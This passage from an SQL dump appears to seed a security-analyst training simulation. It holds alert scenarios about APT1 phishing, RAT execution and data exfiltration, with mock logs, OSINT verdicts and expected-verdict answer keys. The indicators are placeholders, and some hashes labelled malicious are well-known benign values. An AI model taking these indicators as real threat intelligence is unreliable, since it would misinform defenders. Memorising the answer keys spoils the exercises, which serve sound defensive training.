command-and-control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"patient_data_extract.csv\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive patient data\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No detection across multiple AV engines\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.436Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.1.2.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"patient_data_extract.csv\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.436Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.1.2.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"patient_data_extract.csv\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.436Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.1.2.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"patient_data_extract.csv\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.436Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.1.2.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"patient_data_extract.csv\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.436Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.1.2.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"patient_data_extract.csv\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"transfer_size\\\":\\\"15MB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(789, 'Initial Access via Spear Phishing Campaign', 'high', 'Email security logs', 'APT1 initiated the breach with a targeted spear phishing campaign, sending malicious emails to OPM employees to harvest credentials, enabling them to infiltrate the network.', 'Phishing', 'T1566.001', 1, 'investigating', 74, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"email_id\":\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"recipient\":\"jdoe@opm.gov\",\"sender\":\"compromised@trustedsource.com\",\"subject\":\"Urgent: Action Required\",\"attachment_name\":\"HR_Policy_Update.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_url\":\"http://malicious-site.com/login\",\"detected_phishing\":true}', '2026-01-11 23:44:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"URL flagged for phishing.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"compromised@trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"Email address used in multiple phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.438Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"email_id\\\":\\\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.2.3\\\",\\\"recipient\\\":\\\"jdoe@opm.gov\\\",\\\"sender\\\":\\\"compromised@trustedsource.com\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment_name\\\":\\\"HR_Policy_Update.pdf\\\",\\\"attachment_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_url\\\":\\\"http://malicious-site.com/login\\\",\\\"detected_phishing\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:22.438Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"email_id\\\":\\\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.2.3\\\",\\\"recipient\\\":\\\"jdoe@opm.gov\\\",\\\"sender\\\":\\\"compromised@trustedsource.com\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment_name\\\":\\\"HR_Policy_Update.pdf\\\",\\\"attachment_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_url\\\":\\\"http://malicious-site.com/login\\\",\\\"detected_phishing\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:22.438Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"email_id\\\":\\\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.2.3\\\",\\\"recipient\\\":\\\"jdoe@opm.gov\\\",\\\"sender\\\":\\\"compromised@trustedsource.com\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment_name\\\":\\\"HR_Policy_Update.pdf\\\",\\\"attachment_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_url\\\":\\\"http://malicious-site.com/login\\\",\\\"detected_phishing\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:22.438Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"email_id\\\":\\\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.2.3\\\",\\\"recipient\\\":\\\"jdoe@opm.gov\\\",\\\"sender\\\":\\\"compromised@trustedsource.com\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment_name\\\":\\\"HR_Policy_Update.pdf\\\",\\\"attachment_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_url\\\":\\\"http://malicious-site.com/login\\\",\\\"detected_phishing\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:22.438Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"email_id\\\":\\\"3efc57b5-9b4e-4c2e-abc3-7d3b6e2f6f8d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.2.3\\\",\\\"recipient\\\":\\\"jdoe@opm.gov\\\",\\\"sender\\\":\\\"compromised@trustedsource.com\\\",\\\"subject\\\":\\\"Urgent: Action Required\\\",\\\"attachment_name\\\":\\\"HR_Policy_Update.pdf\\\",\\\"attachment_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"malicious_url\\\":\\\"http://malicious-site.com/login\\\",\\\"detected_phishing\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(790, 'Execution of PlugX RAT for Network Control', 'high', 'Endpoint detection and response (EDR) logs', 'APT1 has deployed the PlugX RAT to execute commands and manipulate system processes, ensuring continued access and control over the network. The RAT was executed from a suspicious executable found on the endpoint.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:38Z\",\"event_type\":\"process_creation\",\"hostname\":\"compromised-host\",\"username\":\"john_doe\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.0.113.45\",\"process_name\":\"plugx.exe\",\"process_id\":5678,\"parent_process_id\":1234,\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_path\":\"C:\\\\Users\\\\john_doe\\\\AppData\\\\Local\\\\Temp\\\\plugx.exe\"}', '2026-01-11 23:44:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT1 operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with PlugX RAT executable.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"plugx.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable file related to PlugX RAT.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user of the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(791, 'Exfiltration of Sensitive Personnel Data', 'critical', 'Network traffic analysis', 'With the PlugX RAT in place, APT1 moved laterally to access and exfiltrate sensitive personnel data, including fingerprint records and SF-86 forms, posing a significant threat to national security.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"src_ip\":\"10.0.2.15\",\"dest_ip\":\"203.0.113.45\",\"src_port\":\"443\",\"dest_port\":\"8080\",\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"filename\":\"SF86_form_data.zip\",\"hash\":\"3b1c3497d4f5e7d2a2e8f8b6a9d1c5b2\",\"action\":\"exfiltrate\",\"status\":\"success\"}', '2026-01-11 23:44:22', '2026-02-16 18:00:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known APT1 Command & Control server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b1c3497d4f5e7d2a2e8f8b6a9d1c5b2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"PlugX RAT payload used in data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"SF86_form_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal File Monitoring\",\"verdict\":\"internal\",\"details\":\"Sensitive personnel data file targeted for exfiltration\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(792, 'Initial Access: Spear Phishing Campaign', 'medium', 'Email Gateway Logs', 'APT1 initiated their attack with a series of spear-phishing emails aimed at Starwood employees to harvest credentials and establish a foothold in the network.', 'Spear Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T09:15:32Z\",\"email_id\":\"c28f1e5d-f45e-4b6a-9a1f-ec4b1a9b7c1d\",\"sender_email\":\"john.doe@maliciousdomain.com\",\"recipient_email\":\"jane.smith@starwood.com\",\"subject\":\"Urgent: Verify Your Account Information\",\"attachment\":{\"filename\":\"Invoice_2023.pdf\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\"}', '2026-01-12 22:14:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known to host phishing infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Low detection rate but flagged by multiple engines.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Spear Phishing Campaign\",\"date\":\"2026-02-01T20:32:22.440Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(793, 'Execution: Deployment of Remote Access Trojan', 'high', 'Endpoint Detection and Response (EDR) Systems', 'The attackers deployed a custom Remote Access Trojan (RAT) named \'RATDeploy.exe\' on the compromised system. This malware allows the attacker to execute commands remotely and maintain persistent access.', 'Malware Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:45Z\",\"event_id\":\"evt-123456\",\"host_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"process_name\":\"RATDeploy.exe\",\"process_hash\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"user\":\"compromised_user\",\"action\":\"execute\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\Downloads\\\\RATDeploy.exe\"}', '2026-01-12 22:14:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known Remote Access Trojan.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"RATDeploy.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File used for remote access and command execution.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account on the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(794, 'Persistence: RAT Maintains Control Post-Acquisition', 'high', 'Network Traffic Analysis', 'APT1 demonstrated advanced persistence techniques by adapting their RAT to remain active and undetected during the transition of network control to Marriott. Network traffic analysis detected unexpected outbound connections to a known malicious IP, indicating a potential RAT communication attempt.', 'Persistence Mechanism', 'T1543 - Create or Modify System Process', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"10.1.2.3\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"source_port\":54321,\"destination_port\":8080,\"username\":\"jdoe\",\"process_name\":\"svchost.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"update.dll\",\"event\":\"Outbound Connection\",\"action\":\"Allowed\"}', '2026-01-12 22:14:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT1.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with APT1 RAT payload.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"update.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious DLL loaded by svchost.exe.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User associated with the affected machine during acquisition.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(795, 'Lateral Movement: Exploiting Network Trust', 'high', 'Internal Network Logs', 'An attacker utilized stolen credentials to move laterally within the network, exploiting trust relationships to access critical databases containing sensitive guest information.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:34:12Z\",\"source_ip\":\"192.168.1.45\",\"target_ip\":\"10.0.1.5\",\"action\":\"login\",\"username\":\"j.doe\",\"method\":\"RDP\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"db_access_tool.exe\",\"external_ip\":\"203.0.113.55\",\"event_id\":\"4624\",\"description\":\"Successful login using RDP with stolen credentials\"}', '2026-01-12 22:14:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with a known suspicious tool\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"db_access_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"File used to access databases\"}},{\"id\":\"artifact_6\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
